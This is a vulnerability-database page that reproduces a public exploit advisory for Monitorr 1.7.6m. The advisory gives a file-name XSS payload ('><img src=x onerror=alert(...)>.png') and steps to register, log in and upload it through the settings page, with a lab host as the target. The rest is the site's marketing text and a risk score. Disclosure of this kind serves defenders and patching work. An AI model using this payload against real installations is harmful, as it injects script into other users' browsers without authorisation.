Vulners
Lucene search
Montiorr 1.7.6m Cross Site Scripting
`# Exploit Title: Montiorr 1.7.6m - File Upload to XSS
# Date: 25/4/2021
# Exploit Author: Ahmad Shakla
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Kali GNU/Linux 2020.2
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
An attacker can preform an XSS attack via image upload
Steps :
1)Create a payload with the following format :
><img src=x onerror=alert("XSS")>.png
2) Install the database by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
3)Register for a new account on the server by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
4)Login with your credentials on the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
5)Go to the following link and upload the payload :
https://monitorr.robyns-petshop.thm/settings.php#services-configuration
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2021 00:00Current
7.4High risk
Vulners AI Score7.4